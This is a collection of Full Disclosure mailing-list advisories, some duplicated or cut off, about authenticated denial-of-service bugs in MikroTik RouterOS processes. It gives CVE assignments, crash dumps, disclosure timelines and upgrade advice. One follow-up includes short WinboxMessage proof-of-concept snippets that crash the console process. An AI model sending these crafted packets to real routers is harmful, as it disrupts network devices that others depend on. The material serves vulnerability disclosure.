Re: [FD] Two vulnerabilities found in MikroTik's RouterOS
[Update 2021/05/05] Two CVEs have been assigned to these vulnerabilities. CVE-2020-20267: Mikrotik RouterOs before 6.47 (stable tree) suffers from a memory corruption vulnerability in the /nova/bin/resolver process. An authenticated remote attacker can cause a Denial of Service due to invalid memory access. CVE-2020-20225: Mikrotik RouterOs before 6.47 (stable tree) suffers from an assertion failure vulnerability in the /nova/bin/user process. An authenticated remote attacker can cause a Denial of Service due to an assertion failure via a crafted packet. Q C 于2020年9月9日周三 下午9:02写道: > Advisory: two vulnerabilities found in MikroTik's RouterOS > > > Details > === > > Product: MikroTik's RouterOS > Vendor URL: https://mikrotik.com/ > Vendor Status: fixed version released > CVE: - > Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team > > > Product Description > == > > RouterOS is the operating system used on the MikroTik's devices, such as > switch, router and access point. > > > Description of vulnerabilities > == > > 1. memory corruption > The resolver process suffers from a memory corruption vulnerability. By > sending a crafted packet, an authenticated remote user can crash the > resolver process due to invalid memory access. > > Against stable 6.46.5, the poc resulted in the following crash dump. > > # cat /rw/logs/backtrace.log > 2020.06.18-14:38:03.27@0: > 2020.06.18-14:38:03.27@0: > 2020.06.18-14:38:03.28@0: /nova/bin/resolver > 2020.06.18-14:38:03.28@0: --- signal=11 > > 2020.06.18-14:38:03.28@0: > 2020.06.18-14:38:03.28@0: eip=0x080508f6 eflags=0x00010206 > 2020.06.18-14:38:03.28@0: edi=0x08060620 esi=0x08062018 > ebp=0x7fe5fd08 esp=0x7fe5fcc0 > 2020.06.18-14:38:03.28@0: eax=0x000c ebx=0x08061c98 > ecx=0x77676f00 edx=0x0005 > 2020.06.18-14:38:03.28@0: > 2020.06.18-14:38:03.28@0: maps: > 2020.06.18-14:38:03.28@0: 08048000-0805c000 r-xp 00:0c 995 > /nova/bin/resolver > 2020.06.18-14:38:03.28@0: 7763f000-77674000 r-xp 00:0c 964 > /lib/libuClibc-0.9.33.2.so > 2020.06.18-14:38:03.28@0: 77678000-77692000 r-xp 00:0c 960 > /lib/libgcc_s.so.1 > 2020.06.18-14:38:03.28@0: 77693000-776a2000 r-xp 00:0c 944 > /lib/libuc++.so > 2020.06.18-14:38:03.28@0: 776a3000-776ab000 r-xp 00:0c 950 > /lib/libubox.so > 2020.06.18-14:38:03.28@0: 776ac000-776f8000 r-xp 00:0c 946 > /lib/libumsg.so > 2020.06.18-14:38:03.28@0: 776fe000-77705000 r-xp 00:0c 958 > /lib/ld-uClibc-0.9.33.2.so > 2020.06.18-14:38:03.28@0: > 2020.06.18-14:38:03.28@0: stack: 0x7fe6 - 0x7fe5fcc0 > 2020.06.18-14:38:03.28@0: 03 00 00 00 e4 8a 6f 77 38 fd e5 7f e4 fc > e5 7f c0 dc 05 08 5c 03 e6 7f 08 fd e5 7f 1f e7 04 08 > 2020.06.18-14:38:03.28@0: 58 21 06 08 48 06 06 08 f8 1f 06 08 c0 0c > 00 00 1c fd e5 7f 28 c7 05 08 02 fb 6f 77 98 1c 06 08 > 2020.06.18-14:38:03.28@0: > 2020.06.18-14:38:03.28@0: code: 0x80508f6 > 2020.06.18-14:38:03.28@0: 88 10 8b 43 14 40 89 43 14 8b 55 dc 8d 72 > 04 8b > > This vulnerability was initially found in long-term 6.44.6, and was fixed > in stable 6.47. > > 2. reachable assertion failure > The user process suffers from an assertion failure vulnerability. There is > a reachable assertion in the user process. By sending a crafted packet, an > authenticated remote user can crash the user process due to assertion > failure. > > Against stable 6.46.5, the poc resulted in the following crash dump. > > # cat /rw/logs/backtrace.log > 2020.06.04-17:56:52.31@0: > 2020.06.04-17:56:52.31@0: > 2020.06.04-17:56:52.31@0: /nova/bin/user > 2020.06.04-17:56:52.31@0: --- signal=6 > > 2020.06.04-17:56:52.31@0: > 2020.06.04-17:56:52.31@0: eip=0x7765a55b eflags=0x0246 > 2020.06.04-17:56:52.31@0: edi=0x00fe0001 esi=0x77662200 > ebp=0x7fee3790 esp=0x7fee3788 > 2020.06.04-17:56:52.31@0: eax=0x ebx=0x00b4 > ecx=0x00b4 edx=0x0006 > 2020.06.04-17:56:52.31@0: > 2020.06.04-17:56:52.31@0: maps: > 2020.06.04-17:56:52.31@0: 08048000-08059000 r-xp 00:0c 1002 > /nova/bin/user > 2020.06.04-17:56:52.31@0: 7762c000-77661000 r-xp 00:0c 964 > /lib/libuClibc-0.9.33.2.so > 2020.06.04-17:56:52.31@0: 77665000-7767f000 r-xp 00:0c 960 > /lib/libgcc_s.so.1 > 2020.06.04-17:56:52.31@0: 7768-7768f000 r-xp 00:0c 944 > /lib/libuc++.so > 2020.06.04-17:56:52.31@0: 7769-776ad000 r-xp 00:0c 947 > /lib/libucrypto.so > 2020.06.04-17:56:52.31@0: 776ae000-776b4000 r-xp 00:0c 951 > /lib/liburadius.so > 2020.06.04-17:56:52.31@0: 776b5000-776bd000 r-xp 00:0c 950 > /lib/libubox.so > 2020.06.04-17:56:52.31@0: 776be000-776c1000 r-xp
Re: [FD] Two vulnerabilities found in MikroTik's RouterOS
[Update 2021/05/04] Two CVEs have been assigned to these vulnerabilities. CVE-2020-20219: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a memory corruption vulnerability in the /nova/bin/igmp-proxy process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference). CVE-2020-20262: Mikrotik RouterOs before 6.47 (stable tree) suffers from an assertion failure vulnerability in the /ram/pckg/security/nova/bin/ipsec process. An authenticated remote attacker can cause a Denial of Service due to an assertion failure via a crafted packet. Q C 于2020年8月13日周四 下午7:14写道: > Advisory: two vulnerabilities found in MikroTik's RouterOS > > > Details > === > > Product: MikroTik's RouterOS > Vendor URL: https://mikrotik.com/ > Vendor Status: fixed version released > CVE: - > Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team > > > Product Description > == > > RouterOS is the operating system used on the MikroTik's devices, such as > switch, router and access point. > > > Description of vulnerabilities > == > > 1. NULL pointer dereference > The igmpproxy process suffers from a memory corruption vulnerability. By > sending a crafted packet, an authenticated remote user can crash the > igmpproxy process due to NULL pointer dereference. > > Against stable 6.46.5, the poc resulted in the following crash dump. > > # cat /rw/logs/backtrace.log > 2020.06.04-17:44:27.12@0: > 2020.06.04-17:44:27.12@0: > 2020.06.04-17:44:27.12@0: /ram/pckg/multicast/nova/bin/igmpproxy > 2020.06.04-17:44:27.12@0: --- signal=11 > > 2020.06.04-17:44:27.12@0: > 2020.06.04-17:44:27.12@0: eip=0x08050a8d eflags=0x00010206 > 2020.06.04-17:44:27.12@0: edi=0x7fa9331c esi=0x7fa932b8 > ebp=0x7fa932a8 esp=0x7fa9326c > 2020.06.04-17:44:27.12@0: eax=0x080581bc ebx=0x > ecx=0x000b edx=0x > 2020.06.04-17:44:27.12@0: > 2020.06.04-17:44:27.12@0: maps: > 2020.06.04-17:44:27.12@0: 08048000-08053000 r-xp 00:13 16 > /ram/pckg/multicast/nova/bin/igmpproxy > 2020.06.04-17:44:27.12@0: 7770b000-7774 r-xp 00:0c 964 > /lib/libuClibc-0.9.33.2.so > 2020.06.04-17:44:27.12@0: 77744000-7775e000 r-xp 00:0c 960 > /lib/libgcc_s.so.1 > 2020.06.04-17:44:27.12@0: 7775f000-7776e000 r-xp 00:0c 944 > /lib/libuc++.so > 2020.06.04-17:44:27.12@0: 7776f000-7000 r-xp 00:0c 950 > /lib/libubox.so > 2020.06.04-17:44:27.12@0: 8000-777c4000 r-xp 00:0c 946 > /lib/libumsg.so > 2020.06.04-17:44:27.12@0: 777ca000-777d1000 r-xp 00:0c 958 > /lib/ld-uClibc-0.9.33.2.so > 2020.06.04-17:44:27.12@0: > 2020.06.04-17:44:27.12@0: stack: 0x7fa94000 - 0x7fa9326c > 2020.06.04-17:44:27.12@0: 01 00 00 00 e8 7f 05 08 10 00 00 00 98 32 > a9 7f 11 00 00 00 78 57 05 08 14 33 a9 7f a8 32 a9 7f > 2020.06.04-17:44:27.12@0: 67 29 79 77 04 5d 05 08 6c 25 79 77 d8 32 > a9 7f e0 57 05 08 b8 32 a9 7f 1c 33 a9 7f d8 32 a9 7f > 2020.06.04-17:44:27.12@0: > 2020.06.04-17:44:27.12@0: code: 0x8050a8d > 2020.06.04-17:44:27.12@0: 8b 03 ff 30 6a 01 56 e8 77 a8 ff ff 83 c4 > 0c 0f > > This vulnerability was initially found in long-term 6.44.6, and was fixed > in stable 6.47. > > 2. reachable assertion failure > The ipsec process suffers from an assertion failure vulnerability. There > is a reachable assertion in the ipsec process. By sending a crafted packet, > an authenticated remote user can crash the ipsec process due to assertion > failure. > > Against stable 6.46.5, the poc resulted in the following crash dump. > > # cat /rw/logs/backtrace.log > 2020.06.04-18:25:16.04@0: > 2020.06.04-18:25:16.04@0: > 2020.06.04-18:25:16.04@0: /ram/pckg/security/nova/bin/ipsec > 2020.06.04-18:25:16.04@0: --- signal=6 > > 2020.06.04-18:25:16.04@0: > 2020.06.04-18:25:16.04@0: eip=0x7748155b eflags=0x0246 > 2020.06.04-18:25:16.04@0: edi=0x0001 esi=0x77489200 > ebp=0x7f8fa450 esp=0x7f8fa448 > 2020.06.04-18:25:16.04@0: eax=0x ebx=0x0291 > ecx=0x0291 edx=0x0006 > 2020.06.04-18:25:16.04@0: > 2020.06.04-18:25:16.04@0: maps: > 2020.06.04-18:25:16.04@0: 08048000-080b5000 r-xp 00:11 42 > /ram/pckg/security/nova/bin/ipsec > 2020.06.04-18:25:16.04@0: 77453000-77488000 r-xp 00:0c 964 > /lib/libuClibc-0.9.33.2.so > 2020.06.04-18:25:16.04@0: 7748c000-774a6000 r-xp 00:0c 960 > /lib/libgcc_s.so.1 > 2020.06.04-18:25:16.04@0: 774a7000-774b6000 r-xp 00:0c 944 > /lib/libuc++.so > 2020.06.04-18:25:16.04@0: 774b7000-774b9000 r-xp 00:0c 959 > /lib/libdl-0.9.33.2.so > 2020.06.04-18:25:16.04@0: 774bb000-774d r-xp 00:1f 15 > /ram/pckg/dhcp/lib/libudhcp.so > 2020.06.04-18:25:16.04@0:
Re: [FD] Two vulnerabilities found in MikroTik's RouterOS
[Update 2021/05/04] Two CVEs have been assigned to these vulnerabilities. CVE-2020-20221: Mikrotik RouterOs before 6.44.6 (long-term tree) suffers from an uncontrolled resource consumption vulnerability in the /nova/bin/cerm process. An authenticated remote attacker can cause a Denial of Service due to overloading the systems CPU. CVE-2020-20218: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a memory corruption vulnerability in the /nova/bin/traceroute process. An authenticated remote attacker can cause a Denial of Service due via the loop counter variable. Q C 于2020年5月10日周日 上午10:41写道: > Advisory: two vulnerabilities found in MikroTik's RouterOS > > > Details > === > > Product: MikroTik's RouterOS > Affected Versions: until stable 6.45.7 (first vulnerability), until stable > 6.46.4 (second vulnerability) > Fixed Versions: stable 6.46.x (first vulnerability), stable 6.46.5 (second > vulnerability) > Vendor URL: https://mikrotik.com/ > Vendor Status: fixed version released > CVE: - > Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team > > > Product Description > == > > RouterOS is the operating system used on the MikroTik's devices, such as > switch, router and access point. > > > Description of vulnerabilities > == > > These two vulnerabilities were tested only against the MikroTik RouterOS > stable release tree when found. Maybe other release trees also suffer from > these vulnerabilities. > > 1. The cerm process suffers from an uncontrolled resource consumption > issue. By sending a crafted packet, an authenticated remote user can cause > a high cpu load, which may make the device respond slowly or unable to > respond. > > 2. The traceroute process suffers from a memory corruption issue. By > sending a crafted packet, an authenticated remote user can crash the > traceroute process due to invalid memory access. > > > Solution > > > Upgrade to the corresponding latest RouterOS tree version. > > > References > == > > [1] https://mikrotik.com/download/changelogs/stable-release-tree > > ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Two vulnerabilities found in MikroTik's RouterOS
[Update 2021/05/04] CVE-2020-20212 and CVE-2020-20211 have been assigned to these two vulnerabilities. CVE-2020-20212: Mikrotik RouterOs 6.44.5 (long-term tree) suffers from a memory corruption vulnerability in the /nova/bin/console process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference) CVE-2020-20211: Mikrotik RouterOs 6.44.5 (long-term tree) suffers from an assertion failure vulnerability in the /nova/bin/console process. An authenticated remote attacker can cause a Denial of Service due to an assertion failure via a crafted packet Q C 于2020年4月14日周二 下午6:29写道: > [Update 2020/04/14] The latest stable release tree 6.46.5 still suffers > from these two vulnerabilities. > > Details > === > > Product: MikroTik's RouterOS > Affected Versions: through 6.46.5 (stable release tree) > Fixed Versions: - > Vendor URL: https://mikrotik.com/ > Vendor Status: not fix yet > CVE: - > Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team > > Poc > === > The following pocs are based on the tool routeros ( > https://github.com/tenable/routeros) > > 1) memory corruption in console process > > WinboxMessage msg; > msg.set_to(48, 4); > msg.set_command(0xfe0005); > msg.add_u32(0xfe000c, -1); > msg.add_u32(9, 9); > > 2) assertion failure in console process > > WinboxMessage msg; > msg.set_to(48, 4); > msg.set_command(0xfe0005); > msg.add_u32(0xfe0001, 0); > > Disclosure timeline > === > 2019/08/23reported the 2nd issue to the vendor > 2019/08/26reported the 1st issue to the vendor > 2019/08/28vendor reproduced the 1st issue and will fix it as soon as > possible > 2019/08/30vendor reproduced the 2nd issue and will fix it as soon as > possible > 2019/12/02notified the vendor the 1st issue still exists in version > 6.44.6 (2nd issue fixed) > 2020/01/06no response from the vendor, and did the initial disclosure > 2020/04/14re-tested these two issues against the stable 6.46.5, and > updated the disclosure > > > > Q C 于2020年1月6日周一 下午7:32写道: > >> Advisory: two vulnerabilities found in MikroTik's RouterOS >> >> >> Details >> === >> >> Product: MikroTik's RouterOS >> Affected Versions: before 6.44.6 (Long-term release tree) >> Fixed Versions: 6.44.6 (Long-term release tree) >> Vendor URL: https://mikrotik.com/ >> Vendor Status: fixed version released >> CVE: - >> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team >> >> >> Product Description >> == >> >> RouterOS is the operating system used on the MikroTik's devices, such as >> switch, router and access point. >> >> >> Description of vulnerabilities >> == >> >> These two vulnerabilities were tested only against the MikroTik RouterOS >> long-term release tree when found. Maybe other release trees also suffer >> from these issues. >> >> 1. The console process suffers from a memory corruption issue. >> An authenticated remote user can crash the console process due to a NULL >> pointer reference by sending a crafted packet. >> >> 2. The console process suffers from an assertion failure issue. There is >> a reachable assertion in the console process. An authenticated remote user >> can crash the console process duo to assertion failure by sending a crafted >> packet. >> >> Solution >> >> >> Upgrade to the corresponding latest RouterOS tree version. >> >> >> References >> == >> >> [1] https://mikrotik.com/download/changelogs/long-term-release-tree >> > ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Two vulnerabilities found in MikroTik's RouterOS
Advisory: two vulnerabilities found in MikroTik's RouterOS Details === Product: MikroTik's RouterOS Vendor URL: https://mikrotik.com/ Vendor Status: fixed version released CVE: - Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team Product Description == RouterOS is the operating system used on the MikroTik's devices, such as switch, router and access point. Description of vulnerabilities == 1. memory corruption The resolver process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the resolver process due to invalid memory access. Against stable 6.46.5, the poc resulted in the following crash dump. # cat /rw/logs/backtrace.log 2020.06.18-14:38:03.27@0: 2020.06.18-14:38:03.27@0: 2020.06.18-14:38:03.28@0: /nova/bin/resolver 2020.06.18-14:38:03.28@0: --- signal=11 2020.06.18-14:38:03.28@0: 2020.06.18-14:38:03.28@0: eip=0x080508f6 eflags=0x00010206 2020.06.18-14:38:03.28@0: edi=0x08060620 esi=0x08062018 ebp=0x7fe5fd08 esp=0x7fe5fcc0 2020.06.18-14:38:03.28@0: eax=0x000c ebx=0x08061c98 ecx=0x77676f00 edx=0x0005 2020.06.18-14:38:03.28@0: 2020.06.18-14:38:03.28@0: maps: 2020.06.18-14:38:03.28@0: 08048000-0805c000 r-xp 00:0c 995 /nova/bin/resolver 2020.06.18-14:38:03.28@0: 7763f000-77674000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so 2020.06.18-14:38:03.28@0: 77678000-77692000 r-xp 00:0c 960 /lib/libgcc_s.so.1 2020.06.18-14:38:03.28@0: 77693000-776a2000 r-xp 00:0c 944 /lib/libuc++.so 2020.06.18-14:38:03.28@0: 776a3000-776ab000 r-xp 00:0c 950 /lib/libubox.so 2020.06.18-14:38:03.28@0: 776ac000-776f8000 r-xp 00:0c 946 /lib/libumsg.so 2020.06.18-14:38:03.28@0: 776fe000-77705000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 2020.06.18-14:38:03.28@0: 2020.06.18-14:38:03.28@0: stack: 0x7fe6 - 0x7fe5fcc0 2020.06.18-14:38:03.28@0: 03 00 00 00 e4 8a 6f 77 38 fd e5 7f e4 fc e5 7f c0 dc 05 08 5c 03 e6 7f 08 fd e5 7f 1f e7 04 08 2020.06.18-14:38:03.28@0: 58 21 06 08 48 06 06 08 f8 1f 06 08 c0 0c 00 00 1c fd e5 7f 28 c7 05 08 02 fb 6f 77 98 1c 06 08 2020.06.18-14:38:03.28@0: 2020.06.18-14:38:03.28@0: code: 0x80508f6 2020.06.18-14:38:03.28@0: 88 10 8b 43 14 40 89 43 14 8b 55 dc 8d 72 04 8b This vulnerability was initially found in long-term 6.44.6, and was fixed in stable 6.47. 2. reachable assertion failure The user process suffers from an assertion failure vulnerability. There is a reachable assertion in the user process. By sending a crafted packet, an authenticated remote user can crash the user process due to assertion failure. Against stable 6.46.5, the poc resulted in the following crash dump. # cat /rw/logs/backtrace.log 2020.06.04-17:56:52.31@0: 2020.06.04-17:56:52.31@0: 2020.06.04-17:56:52.31@0: /nova/bin/user 2020.06.04-17:56:52.31@0: --- signal=6 2020.06.04-17:56:52.31@0: 2020.06.04-17:56:52.31@0: eip=0x7765a55b eflags=0x0246 2020.06.04-17:56:52.31@0: edi=0x00fe0001 esi=0x77662200 ebp=0x7fee3790 esp=0x7fee3788 2020.06.04-17:56:52.31@0: eax=0x ebx=0x00b4 ecx=0x00b4 edx=0x0006 2020.06.04-17:56:52.31@0: 2020.06.04-17:56:52.31@0: maps: 2020.06.04-17:56:52.31@0: 08048000-08059000 r-xp 00:0c 1002 /nova/bin/user 2020.06.04-17:56:52.31@0: 7762c000-77661000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so 2020.06.04-17:56:52.31@0: 77665000-7767f000 r-xp 00:0c 960 /lib/libgcc_s.so.1 2020.06.04-17:56:52.31@0: 7768-7768f000 r-xp 00:0c 944 /lib/libuc++.so 2020.06.04-17:56:52.31@0: 7769-776ad000 r-xp 00:0c 947 /lib/libucrypto.so 2020.06.04-17:56:52.31@0: 776ae000-776b4000 r-xp 00:0c 951 /lib/liburadius.so 2020.06.04-17:56:52.31@0: 776b5000-776bd000 r-xp 00:0c 950 /lib/libubox.so 2020.06.04-17:56:52.31@0: 776be000-776c1000 r-xp 00:0c 948 /lib/libuxml++.so 2020.06.04-17:56:52.31@0: 776c2000-7770e000 r-xp 00:0c 946 /lib/libumsg.so 2020.06.04-17:56:52.31@0: 77714000-7771b000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 2020.06.04-17:56:52.31@0: 2020.06.04-17:56:52.31@0: stack: 0x7fee4000 - 0x7fee3788 2020.06.04-17:56:52.31@0: 00 20 66 77 00 20 66 77 c8 37 ee 7f 77 60 65 77 06 00 00 00 00 22 66 77 20 00 00 00 00 00 00 00 2020.06.04-17:56:52.31@0: 15 00 00 00 28 38 ee 7f c4 37 ee 7f e4 ea 70 77 01 00 00 00 e4 ea 70 77 15 00 00 00 01 00 fe 00 2020.06.04-17:56:52.31@0: 2020.06.04-17:56:52.31@0: code: 0x7765a55b 2020.06.04-17:56:52.31@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7 d8 This vulnerability was initially found in long-term 6.44.6, and was fixed in stable 6.47. Solution
[FD] Two vulnerabilities found in MikroTik's RouterOS
Advisory: two vulnerabilities found in MikroTik's RouterOS Details === Product: MikroTik's RouterOS Vendor URL: https://mikrotik.com/ Vendor Status: fixed version released CVE: - Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team Product Description == RouterOS is the operating system used on the MikroTik's devices, such as switch, router and access point. Description of vulnerabilities == 1. NULL pointer dereference The igmpproxy process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the igmpproxy process due to NULL pointer dereference. Against stable 6.46.5, the poc resulted in the following crash dump. # cat /rw/logs/backtrace.log 2020.06.04-17:44:27.12@0: 2020.06.04-17:44:27.12@0: 2020.06.04-17:44:27.12@0: /ram/pckg/multicast/nova/bin/igmpproxy 2020.06.04-17:44:27.12@0: --- signal=11 2020.06.04-17:44:27.12@0: 2020.06.04-17:44:27.12@0: eip=0x08050a8d eflags=0x00010206 2020.06.04-17:44:27.12@0: edi=0x7fa9331c esi=0x7fa932b8 ebp=0x7fa932a8 esp=0x7fa9326c 2020.06.04-17:44:27.12@0: eax=0x080581bc ebx=0x ecx=0x000b edx=0x 2020.06.04-17:44:27.12@0: 2020.06.04-17:44:27.12@0: maps: 2020.06.04-17:44:27.12@0: 08048000-08053000 r-xp 00:13 16 /ram/pckg/multicast/nova/bin/igmpproxy 2020.06.04-17:44:27.12@0: 7770b000-7774 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so 2020.06.04-17:44:27.12@0: 77744000-7775e000 r-xp 00:0c 960 /lib/libgcc_s.so.1 2020.06.04-17:44:27.12@0: 7775f000-7776e000 r-xp 00:0c 944 /lib/libuc++.so 2020.06.04-17:44:27.12@0: 7776f000-7000 r-xp 00:0c 950 /lib/libubox.so 2020.06.04-17:44:27.12@0: 8000-777c4000 r-xp 00:0c 946 /lib/libumsg.so 2020.06.04-17:44:27.12@0: 777ca000-777d1000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 2020.06.04-17:44:27.12@0: 2020.06.04-17:44:27.12@0: stack: 0x7fa94000 - 0x7fa9326c 2020.06.04-17:44:27.12@0: 01 00 00 00 e8 7f 05 08 10 00 00 00 98 32 a9 7f 11 00 00 00 78 57 05 08 14 33 a9 7f a8 32 a9 7f 2020.06.04-17:44:27.12@0: 67 29 79 77 04 5d 05 08 6c 25 79 77 d8 32 a9 7f e0 57 05 08 b8 32 a9 7f 1c 33 a9 7f d8 32 a9 7f 2020.06.04-17:44:27.12@0: 2020.06.04-17:44:27.12@0: code: 0x8050a8d 2020.06.04-17:44:27.12@0: 8b 03 ff 30 6a 01 56 e8 77 a8 ff ff 83 c4 0c 0f This vulnerability was initially found in long-term 6.44.6, and was fixed in stable 6.47. 2. reachable assertion failure The ipsec process suffers from an assertion failure vulnerability. There is a reachable assertion in the ipsec process. By sending a crafted packet, an authenticated remote user can crash the ipsec process due to assertion failure. Against stable 6.46.5, the poc resulted in the following crash dump. # cat /rw/logs/backtrace.log 2020.06.04-18:25:16.04@0: 2020.06.04-18:25:16.04@0: 2020.06.04-18:25:16.04@0: /ram/pckg/security/nova/bin/ipsec 2020.06.04-18:25:16.04@0: --- signal=6 2020.06.04-18:25:16.04@0: 2020.06.04-18:25:16.04@0: eip=0x7748155b eflags=0x0246 2020.06.04-18:25:16.04@0: edi=0x0001 esi=0x77489200 ebp=0x7f8fa450 esp=0x7f8fa448 2020.06.04-18:25:16.04@0: eax=0x ebx=0x0291 ecx=0x0291 edx=0x0006 2020.06.04-18:25:16.04@0: 2020.06.04-18:25:16.04@0: maps: 2020.06.04-18:25:16.04@0: 08048000-080b5000 r-xp 00:11 42 /ram/pckg/security/nova/bin/ipsec 2020.06.04-18:25:16.04@0: 77453000-77488000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so 2020.06.04-18:25:16.04@0: 7748c000-774a6000 r-xp 00:0c 960 /lib/libgcc_s.so.1 2020.06.04-18:25:16.04@0: 774a7000-774b6000 r-xp 00:0c 944 /lib/libuc++.so 2020.06.04-18:25:16.04@0: 774b7000-774b9000 r-xp 00:0c 959 /lib/libdl-0.9.33.2.so 2020.06.04-18:25:16.04@0: 774bb000-774d r-xp 00:1f 15 /ram/pckg/dhcp/lib/libudhcp.so 2020.06.04-18:25:16.04@0: 774d2000-774d8000 r-xp 00:0c 951 /lib/liburadius.so 2020.06.04-18:25:16.04@0: 774d9000-77524000 r-xp 00:0c 956 /lib/libssl.so.1.0.0 2020.06.04-18:25:16.04@0: 77528000-7753 r-xp 00:0c 950 /lib/libubox.so 2020.06.04-18:25:16.04@0: 77531000-7757d000 r-xp 00:0c 946 /lib/libumsg.so 2020.06.04-18:25:16.04@0: 7758-7759d000 r-xp 00:0c 947 /lib/libucrypto.so 2020.06.04-18:25:16.04@0: 7759e000-776fb000 r-xp 00:0c 954 /lib/libcrypto.so.1.0.0 2020.06.04-18:25:16.04@0: 7770e000-77715000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 2020.06.04-18:25:16.04@0: 2020.06.04-18:25:16.04@0: stack: 0x7f8fb000 - 0x7f8fa448 2020.06.04-18:25:16.04@0: 00 90 48 77 00 90 48 77 88 a4 8f 7f 77 d0 47 77 06 00 00 00 00 92 48 77 20 00 00 00
[FD] Two vulnerabilities found in MikroTik's RouterOS
Advisory: two vulnerabilities found in MikroTik's RouterOS Details === Product: MikroTik's RouterOS Affected Versions: until stable 6.45.7 (first vulnerability), until stable 6.46.4 (second vulnerability) Fixed Versions: stable 6.46.x (first vulnerability), stable 6.46.5 (second vulnerability) Vendor URL: https://mikrotik.com/ Vendor Status: fixed version released CVE: - Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team Product Description == RouterOS is the operating system used on the MikroTik's devices, such as switch, router and access point. Description of vulnerabilities == These two vulnerabilities were tested only against the MikroTik RouterOS stable release tree when found. Maybe other release trees also suffer from these vulnerabilities. 1. The cerm process suffers from an uncontrolled resource consumption issue. By sending a crafted packet, an authenticated remote user can cause a high cpu load, which may make the device respond slowly or unable to respond. 2. The traceroute process suffers from a memory corruption issue. By sending a crafted packet, an authenticated remote user can crash the traceroute process due to invalid memory access. Solution Upgrade to the corresponding latest RouterOS tree version. References == [1] https://mikrotik.com/download/changelogs/stable-release-tree ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Two vulnerabilities found in MikroTik's RouterOS
[Update 2020/04/14] The latest stable release tree 6.46.5 still suffers from these two vulnerabilities. Details === Product: MikroTik's RouterOS Affected Versions: through 6.46.5 (stable release tree) Fixed Versions: - Vendor URL: https://mikrotik.com/ Vendor Status: not fix yet CVE: - Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team Poc === The following pocs are based on the tool routeros ( https://github.com/tenable/routeros) 1) memory corruption in console process WinboxMessage msg; msg.set_to(48, 4); msg.set_command(0xfe0005); msg.add_u32(0xfe000c, -1); msg.add_u32(9, 9); 2) assertion failure in console process WinboxMessage msg; msg.set_to(48, 4); msg.set_command(0xfe0005); msg.add_u32(0xfe0001, 0); Disclosure timeline === 2019/08/23reported the 2nd issue to the vendor 2019/08/26reported the 1st issue to the vendor 2019/08/28vendor reproduced the 1st issue and will fix it as soon as possible 2019/08/30vendor reproduced the 2nd issue and will fix it as soon as possible 2019/12/02notified the vendor the 1st issue still exists in version 6.44.6 (2nd issue fixed) 2020/01/06no response from the vendor, and did the initial disclosure 2020/04/14re-tested these two issues against the stable 6.46.5, and updated the disclosure Q C 于2020年1月6日周一 下午7:32写道: > Advisory: two vulnerabilities found in MikroTik's RouterOS > > > Details > === > > Product: MikroTik's RouterOS > Affected Versions: before 6.44.6 (Long-term release tree) > Fixed Versions: 6.44.6 (Long-term release tree) > Vendor URL: https://mikrotik.com/ > Vendor Status: fixed version released > CVE: - > Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team > > > Product Description > == > > RouterOS is the operating system used on the MikroTik's devices, such as > switch, router and access point. > > > Description of vulnerabilities > == > > These two vulnerabilities were tested only against the MikroTik RouterOS > long-term release tree when found. Maybe other release trees also suffer > from these issues. > > 1. The console process suffers from a memory corruption issue. > An authenticated remote user can crash the console process due to a NULL > pointer reference by sending a crafted packet. > > 2. The console process suffers from an assertion failure issue. There is a > reachable assertion in the console process. An authenticated remote user > can crash the console process duo to assertion failure by sending a crafted > packet. > > Solution > > > Upgrade to the corresponding latest RouterOS tree version. > > > References > == > > [1] https://mikrotik.com/download/changelogs/long-term-release-tree > ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Two vulnerabilities found in MikroTik's RouterOS
Advisory: two vulnerabilities found in MikroTik's RouterOS Details === Product: MikroTik's RouterOS Affected Versions: before 6.44.6 (Long-term release tree) Fixed Versions: 6.44.6 (Long-term release tree) Vendor URL: https://mikrotik.com/ Vendor Status: fixed version released CVE: - Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team Product Description == RouterOS is the operating system used on the MikroTik's devices, such as switch, router and access point. Description of vulnerabilities == These two vulnerabilities were tested only against the MikroTik RouterOS long-term release tree when found. Maybe other release trees also suffer from these issues. 1. The console process suffers from a memory corruption issue. An authenticated remote user can crash the console process due to a NULL pointer reference by sending a crafted packet. 2. The console process suffers from an assertion failure issue. There is a reachable assertion in the console process. An authenticated remote user can crash the console process duo to assertion failure by sending a crafted packet. Solution Upgrade to the corresponding latest RouterOS tree version. References == [1] https://mikrotik.com/download/changelogs/long-term-release-tree ___ Sent through the Full Disclosure mailing list 